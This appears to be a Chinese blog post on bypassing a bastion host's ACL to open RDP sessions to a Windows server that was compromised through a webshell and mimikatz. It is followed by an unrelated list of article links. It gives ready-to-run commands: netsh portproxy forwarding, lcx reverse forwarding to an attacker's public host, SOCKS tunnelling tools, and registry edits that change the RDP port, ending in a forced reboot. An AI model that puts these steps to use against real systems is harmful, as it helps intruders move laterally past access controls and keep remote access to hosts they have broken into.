如何绕过堡垒机远程登录
时间:2022-07-23
本文章向大家介绍如何绕过堡垒机远程登录,主要内容包括其使用实例、应用技巧、基本知识点总结和需要注意事项,具有一定的参考价值,需要的朋友可以参考一下。
假设一个场景:在Webshell中执行mimikatz获取到win管理员密码,并且本地查看端口3389是开放的,可是从当前跳板机无法远程到目标机器。因为某个特定需求,一定要远程登录到这台win服务器,这时该怎么办?
首先我们先分析一下这个场景,端口开放却无法连接,最有可能的情况,就是到达目标网段受到ACL策略限制,只允许通过特定网段登录,比如说堡垒机。大多数堡垒机部署时,为了不改变现有的网络拓扑结构,采用旁路部署的方案,通过ACL策略限制用户访问特定端口。
那么,我们就可以用另一种方式来描述这个问题:目标服务器远程端口受到ACL限制,但其他端口没有限制,那么,最简单的解决方式就可以通过端口转发来绕过。
1、使用netsh命令进行端口转发
Windows自带的netshnetsh实现端口转发,监听12345端口,转发到本地3389端口,可绕过访问策略限制。
#A、3389端口转发到12345端口
netsh interface portproxy add v4tov4 listenaddress=192.168.126.32 listenport=12345 connectaddress=192.168.126.32 connectport=3389
#B、查看配置好的端口映射清单
C:Windowssystem32>netsh interface portproxy show v4tov4
侦听 ipv4: 连接到 ipv4:
地址 端口 地址 端口
--------------- ---------- --------------- ----------
192.168.126.32 12345 192.168.126.32 3389
这样一来,通过攻击机跳板机直接远程目标机器的12345端口,就可以实现远程登录。
2、LCX 端口转发
在目标机器上执行:lcx.exe -slave 公网ip 51 内网ip 3389
在公网的机器执行:Lcx.exe –listen 51 3340
本地机器上连接 127.0.0.1:3340,即可连接上目标机器的3389。
3、内网穿透工具
SOCKS代理,如Ngrok、frp、EW、reGeorg、sSocks等
通过利用SOCKS协议,结合Proxifier使用,可实现mstsc登录目标主机。
4、修改Windows远程桌面端口
通过修改Windows默认远程桌面端口,从而绕过ACL策略访问限制。
修改注册表,命令如下:
REG ADD "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWdsrdpwdTdstcp" /v "PortNumber" /t REG_DWORD /d 12345/f
REG ADD "HKEY_LOCAL_MACHINESystemCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp" /v "PortNumber" /t REG_DWORD /d 12345 /f
强制重启目标服务器后,注册表生效。
shutdown -r -t 0
此时,就可以远程目标服务器的12345登录。
- javascript 红皮高程(8)
- javascript 红皮高程(7)
- javascript 红皮高程(17)-- 左移(<<)
- javascript 红皮高程(17)-- 按位异或(XOR)
- javascript 红皮高程(17)
- javascript 红皮高程(16)
- javascript 红皮高程(15)
- javascript 红皮高程(21)-- 乘性操作符
- javascript 红皮高程(20)-- 逻辑或
- javascript 红皮高程(19)-- 逻辑与
- 技术分享 | 浅谈 RAS
- Sniper-OJ 练习平台多题WriteUp
- 怎么能学透一个知识点
- Jarvis-OJ平台多题WriteUp分享
- JavaScript 教程
- JavaScript 编辑工具
- JavaScript 与HTML
- JavaScript 与Java
- JavaScript 数据结构
- JavaScript 基本数据类型
- JavaScript 特殊数据类型
- JavaScript 运算符
- JavaScript typeof 运算符
- JavaScript 表达式
- JavaScript 类型转换
- JavaScript 基本语法
- JavaScript 注释
- Javascript 基本处理流程
- Javascript 选择结构
- Javascript if 语句
- Javascript if 语句的嵌套
- Javascript switch 语句
- Javascript 循环结构
- Javascript 循环结构实例
- Javascript 跳转语句
- Javascript 控制语句总结
- Javascript 函数介绍
- Javascript 函数的定义
- Javascript 函数调用
- Javascript 几种特殊的函数
- JavaScript 内置函数简介
- Javascript eval() 函数
- Javascript isFinite() 函数
- Javascript isNaN() 函数
- parseInt() 与 parseFloat()
- escape() 与 unescape()
- Javascript 字符串介绍
- Javascript length属性
- javascript 字符串函数
- Javascript 日期对象简介
- Javascript 日期对象用途
- Date 对象属性和方法
- Javascript 数组是什么
- Javascript 创建数组
- Javascript 数组赋值与取值
- Javascript 数组属性和方法
- 分析网页 JavaScript Bundles 的几种方法
- 使用 DevTools 新增的 Issues 选项卡发现网页问题
- OpenCV绘制标记函数drawMarker()
- 【crossbeam系列】3 crossbeam-deque:work-stealing算法
- 【Rust日报】2020-08-21 RustConf研讨会在线举办
- 了解不同架构思维,赏析架构之美
- 【Rust日报】2020-08-22 google/autocxx - 高度自动化的rust调用c++,而且安全,时尚
- 【Rust日报】2020-08-24 理解 Rust 的切片
- 猿实战05——手把手教你拥有自己的代码生成器
- Java单元测试——容器内部测试
- Java单元测试——框架(三)——testNG
- Nginx系列:后端服务应用健康检测
- 那些大厂必问的Handler和Binder,有必要去研究么?
- 欢迎来到 TreeMap 的吐槽大会
- OMG,12 个精致的 Java 字符串操作小技巧,学它